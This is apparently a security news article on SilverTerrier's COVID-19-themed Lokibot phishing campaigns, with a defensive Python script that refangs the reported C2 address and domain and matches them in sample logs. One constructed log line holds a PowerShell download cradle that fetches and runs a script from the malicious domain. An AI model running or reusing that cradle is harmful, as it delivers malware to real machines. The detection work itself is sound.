Researchers at Palo Alto Networks observed a Nigerian cyber gang, tracked as SilverTerrier and specialized in BEC attacks, using COVID-19 lures in a recent wave of attacks on healthcare and government organizations.
SilverTerrier has been active since at least 2014 and is a collective of hundreds of individual threat actors.
BEC attacks continue to threaten organizations worldwide: according to the latest Internet Crime Complaint Center (IC3) report, the FBI recorded 23,775 BEC complaints in 2019, resulting in an estimated US$1.77 billion in global losses.
“Over the past 90 days (Jan. 30 – Apr. 30), we have observed three SilverTerrier actors/groups launch a series of 10 COVID-19 themed malware campaigns.” reads the analysis published by Palo Alto Networks. “Specifically, we find it alarming that several of these campaigns recklessly included targets at government healthcare agencies, local and regional governments, large universities with medical programs/centers, regional utilities, medical publishing firms, and insurance companies across the United States, Australia, Canada, Italy, and the United Kingdom.”
Between January 30 and April 30, 2020, the researchers observed three SilverTerrier groups launching ten COVID-19-themed malware campaigns; some of these campaigns also targeted organizations directly involved in the COVID-19 response.
The good news is that none of the attacks carried out by the SilverTerrier groups using COVID-19 lures has been successful in compromising the victims.
The first campaign was launched on January 30, 2020; experts observed several variations of the email subject line, written in both English and Indonesian.
The email messages used an attachment disguised as an Indonesian health department document to deliver a variant of the Lokibot malware.
A few weeks later, the threat actors launched multiple attacks that attempted to exploit CVE-2017-11882, a memory corruption flaw in the legacy Equation Editor component (EQNEDT32.EXE) of Microsoft Office, to run a malicious executable on the victim's machine.
These attacks, which delivered various malware families, targeted a major utility provider, a university, and a government agency in the United States, a health agency in Canada, a health insurance provider and an energy company in Australia, and a European medical publishing company.
Other campaigns observed in March and April targeted US organizations (government health agencies, universities with medical programs, state infrastructure, and a health insurance company), a Canadian health insurer, a university and regional government in Italy, and various government institutions in Australia.
“On April 8, 2020, we witnessed the most recent campaign by this actor. Distributed broadly, targets of this campaign included a government health agency, state infrastructure, and a health insurance company in the United States, in addition to a university and regional government in Italy, and various government institutions in Australia.” continues the report. “Disguised as COVID-19 relief materials coming from a “Thai Medical Department,” these phishing emails were delivered with one of two samples of Lokibot malware designed to call out to 185[.]126[.]202[.]111 for command and control.”
In the second half of March, a second SilverTerrier actor sent phishing emails to several organizations, including a government health agency in the United States, attempting to deliver the Lokibot malware to the intended victims.
On March 23 and 24, a third actor tracked as Black Emeka launched a series of attacks using emails disguised as COVID-19 information. The attached malware samples use PowerShell to download malicious payloads from the domain goldenlion[.]sg.
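The report's network indicators (the Lokibot C2 address and the Black Emeka download domain) are published defanged, so a detection engineer has to refang them and then match them carefully: an IP must not match inside a longer address, and a domain indicator should catch subdomains such as `cdn.goldenlion.sg` but not a look-alike such as `goldenlion.sg.example.org`. The script below is an added example written for this article, not code from Palo Alto Networks or Security Affairs; the log lines are constructed for the example and the PowerShell download cradle in them is hypothetical.

```python
"""Refang the two IOCs from the report and match them against sample logs.

Added example; not code from Palo Alto Networks or Security Affairs. The IOCs
are the two published in the article; the log lines are constructed here.
"""
import ipaddress
import re

DEFANGED_IOCS = ["185[.]126[.]202[.]111", "goldenlion[.]sg"]

# Constructed DNS, proxy and PowerShell script-block log lines (hypothetical).
SAMPLE_LOGS = [
    "2020-04-08T10:15:02Z dns src=10.0.0.23 qname=goldenlion.sg. qtype=A",
    "2020-04-08T10:15:03Z proxy src=10.0.0.23 dst=185.126.202.111:80 method=POST uri=/upload",
    "2020-04-08T10:16:10Z proxy src=10.0.0.45 dst=93.184.216.34:443 method=GET uri=/",
    "2020-04-08T10:17:41Z ps_scriptblock host=WS-17 text=IEX (New-Object Net.WebClient)"
    ".DownloadString('http://cdn.goldenlion.sg/x.ps1')",
    "2020-04-08T10:18:00Z dns src=10.0.0.45 qname=goldenlion.sg.example.org qtype=A",
]


def refang(ioc: str) -> str:
    """Undo common defanging: 185[.]1 -> 185.1, (.) / [dot] -> ., hxxp:// -> http://."""
    s = ioc.strip()
    s = re.sub(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", ".", s, flags=re.IGNORECASE)
    s = re.sub(r"^hxxps?://", lambda m: m.group(0).lower().replace("xx", "tt"), s,
               flags=re.IGNORECASE)
    return s.lower()


def classify(ioc: str) -> str:
    """Return 'ip' for a literal address, otherwise 'domain' (only those two kinds here)."""
    try:
        ipaddress.ip_address(ioc)
        return "ip"
    except ValueError:
        return "domain"


def build_matchers(defanged: list) -> list:
    """Compile one anchored regex per IOC so matches are exact tokens, not substrings."""
    matchers = []
    for raw in defanged:
        ioc = refang(raw)
        kind = classify(ioc)
        if kind == "ip":
            # Reject matches embedded in a longer dotted number (e.g. 1185.126.202.111).
            pat = re.compile(r"(?<![\d.])" + re.escape(ioc) + r"(?![\d.])")
        else:
            # Accept the domain and its subdomains; reject it as a prefix of another
            # name (goldenlion.sg.example.org) while allowing a trailing dot (FQDN).
            pat = re.compile(
                r"(?<![a-z0-9.-])(?:[a-z0-9-]+\.)*" + re.escape(ioc) + r"(?![a-z0-9-]|\.[a-z0-9-])",
                re.IGNORECASE,
            )
        matchers.append((ioc, kind, pat))
    return matchers


def scan_logs(lines: list, matchers: list) -> list:
    """Return (line_number, kind, ioc) for every IOC hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ioc, kind, pat in matchers:
            if pat.search(line):
                hits.append((n, kind, ioc))
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS, build_matchers(DEFANGED_IOCS)):
        print(hit)
```

Lines 1, 2 and 4 of the sample should fire (the FQDN with trailing dot, the C2 address, and the subdomain inside the download cradle) while line 5, where the domain is merely a prefix of an unrelated name, should not. Commodity C2 infrastructure like this turns over quickly, so treat the IP as a short-lived indicator and pair it with behavioural detections such as PowerShell script-block logging of `DownloadString`/`DownloadFile` calls.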
Palo Alto Networks expects SilverTerrier actors to keep using COVID-19 lures to infect their victims' systems.
“Given the global impacts of COVID-19, SilverTerrier actors have begun adapting their phishing campaigns and will likely continue to use COVID-19-themed emails to deliver commodity malware broadly in support of their objectives.” Palo Alto Networks concludes.
“In light of this trend, we encourage government agencies, healthcare and insurance organizations, public utilities, and universities with medical programs to apply extra scrutiny to COVID-19-related emails containing attachments.”
(SecurityAffairs – BEC, COVID-19)